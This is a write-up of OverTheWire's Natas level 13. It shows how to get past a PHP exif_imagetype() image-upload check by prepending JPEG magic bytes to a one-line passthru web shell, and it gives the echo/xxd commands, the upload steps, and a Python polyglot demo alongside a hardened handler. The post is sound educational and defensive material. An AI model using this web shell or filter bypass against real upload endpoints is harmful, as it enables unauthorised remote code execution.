Natas Level 13 – Image File Restricted Upload

In this post we’re going to be looking at Level 13 of the Natas wargame hosted by Over The Wire.

What’s Going On?

Upon logging in, we see nearly the same setup as in level 12, except for a statement that uploading is restricted to image files only.  To find out how that restriction is enforced, let's take a look at the source code.  It is almost identical to level 12's, differing in only two lines: there is now an added check on the uploaded file.  The check calls PHP's exif_imagetype() function on the file to decide whether it is an image.  If the function says it isn't, an error is printed to the screen and the file isn't uploaded; if it says it is, the file is uploaded and a link to it is printed, exactly as before.  So, given that this level checks the file's type, what can we do with it?

Exploit

Let's RTFM for exif_imagetype().  The manual says it "reads the first bytes of an image and checks its signature."  Ok, neat.  But what can we do with that?  The important word is "first": the function compares only the leading bytes of the file against a table of known image signatures and never looks at the rest.  A quick search for the JPEG file signature tells us that a JPEG file starts with the bytes FF D8 FF, and the common JFIF variant has E0 as the fourth byte, giving FF D8 FF E0 (hex).  Great.  So we need to construct a file whose first four bytes are exactly those, and end it with our PHP snippet from the last level.

So, to write the hex data, let's jump to our Linux command line.  To put the raw bytes and the PHP into a file, use the following commands (the first one creates the file fresh so a stale copy can't get in the way, the second appends the PHP):

[somebox]$ echo 'FFD8FFE0' | xxd -r -p > natas13attackfile.php
[somebox]$ echo "<? passthru(\$_GET['h']); ?>" >> natas13attackfile.php

We should now have our correctly crafted "image" file.  You can confirm it with a hex dump of the first few bytes: FF D8 FF E0 followed by the ASCII of the PHP snippet.  Now, we simply follow what we did in the last level to upload it.  Download the current level's HTML, alter the action URL in the form declaration to point at the real natas13 site, and change the hidden filename field's value to a .php extension.  Log into the natas13 website in your browser, then use the local page to submit the upload.  After the upload, follow the link and pass the same command as last time via the h parameter, this time reading the natas14 password file.  Upon execution this tactic works, and the Level 14 password is revealed.

So What?

In an attempt to limit uploads to images, this level uses exif_imagetype().  However, that function only inspects the first bytes of the file, so a file that starts with a valid signature passes no matter what follows.  On top of that, PHP emits everything outside of PHP tags as literal output and only interprets what sits between <? and ?>, so the four magic bytes are simply sent to the browser ahead of the command output and do no harm to the payload.  Because of this, we were still able to upload a file that begins with the bytes of an image and later contains valid PHP within PHP tags.  Also, this level didn't fix the real problem from level 12: the extension of the stored file still comes from the user-supplied filename field, so a .php extension causes the file to run through the PHP interpreter.  These things together produce the vulnerability we exploited.  A signature check on its own is not a safe way to accept user files; the server should pick the stored name and extension itself (based on the type it detected, never on the user's filename), keep uploads where scripts are not executed, and ideally re-encode the image so none of the original bytes survive.
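To make the two points above concrete, here is an added Python example (not code from the Natas post or from the level's source) that builds the same polyglot file the Exploit section creates with echo and xxd, runs it through a signature-only check modelled on how exif_imagetype() works, and then through the hardened handling described in this paragraph.  The signature table, the weak_upload and hardened_upload functions and the upload/ path prefix are this example's own assumptions; nothing talks to the Natas server.

```python
"""Added example: JPEG/PHP polyglot versus a signature-only upload check.

Not code from the Natas write-up or from the level's source. The signature
table and both upload handlers are models written for this illustration.
"""
import hashlib
import re

# Leading-byte signatures for common image formats. exif_imagetype() decides
# the same way: it compares only the first bytes against a table like this.
SIGNATURES = {
    "jpeg": b"\xff\xd8\xff",          # JPEG SOI marker; 4th byte varies (E0 JFIF, E1 Exif)
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",                   # GIF87a / GIF89a
}

# Matches a PHP open tag: "<?php", "<?=" or the short "<?" followed by whitespace.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=|\s)")


def image_type(data: bytes):
    """Return the detected type by leading bytes only, or None (mimics exif_imagetype)."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None


def make_polyglot(php_payload: bytes, magic: bytes = b"\xff\xd8\xff\xe0") -> bytes:
    """Equivalent of the echo/xxd commands: magic bytes, then a PHP snippet.

    PHP sends the leading bytes to the client verbatim and only executes what
    sits between <? and ?>, so the image signature does not disturb the payload.
    """
    return magic + php_payload + b"\n"


def weak_upload(data: bytes, user_filename: str):
    """Model of the level's logic (assumed, not copied): signature check, then the
    extension is taken from the attacker-controlled filename field.
    Returns the stored path, or None if rejected."""
    if image_type(data) is None:
        return None
    ext = user_filename.rsplit(".", 1)[-1]   # attacker-controlled extension
    return "upload/%s.%s" % (hashlib.sha1(data).hexdigest()[:10], ext)


def hardened_upload(data: bytes, user_filename: str):
    """Hardened handling: the user's filename is ignored entirely, the extension
    comes from the detected type, the stored name is server-generated, and any
    embedded PHP open tag is rejected as defence in depth.
    Returns the stored path, or None if rejected."""
    kind = image_type(data)
    if kind is None:
        return None
    if PHP_OPEN_TAG.search(data):
        return None
    ext = {"jpeg": "jpg", "png": "png", "gif": "gif"}[kind]
    return "upload/%s.%s" % (hashlib.sha256(data).hexdigest()[:16], ext)


if __name__ == "__main__":
    payload = b"<? passthru($_GET['h']); ?>"      # the snippet from the post
    poly = make_polyglot(payload)
    print("detected type:", image_type(poly))       # jpeg: the check is fooled
    print("weak handler stores:", weak_upload(poly, "natas13attackfile.php"))
    print("hardened handler stores:", hardened_upload(poly, "natas13attackfile.php"))
```

The tag filter in hardened_upload is only a backstop; the decisive fix is that the stored extension never depends on what the client sent, so even a file that slips past the filter lands as .jpg and is served as static data rather than handed to the PHP interpreter.  Re-encoding the image with an image library before storing it would remove the trailing bytes altogether and is the stronger option where available.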

This entry was posted in Natas, Over The Wire, Wargames.